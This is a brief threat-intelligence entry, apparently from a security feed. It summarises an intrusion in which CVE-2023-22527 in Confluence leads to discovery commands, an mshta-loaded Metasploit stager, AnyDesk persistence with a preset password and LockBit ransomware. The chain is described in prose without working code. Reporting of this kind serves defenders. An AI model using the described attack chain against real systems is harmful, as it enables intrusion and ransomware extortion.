Intel Name: Confluence exploit leads to lockbit ransomware
Date of Scan: February 28, 2025
Impact: High
Summary: The attack began with the exploitation of CVE-2023-22527, a critical RCE vulnerability in Confluence, on a Windows server. Initial signs of activity included system discovery commands like net user and whoami. The attacker attempted to download AnyDesk via curl, failing at first but later retrieving it using mshta and a remote HTA file containing a Metasploit stager. After establishing command and control, they installed AnyDesk with a preset password, ensuring persistent remote access.
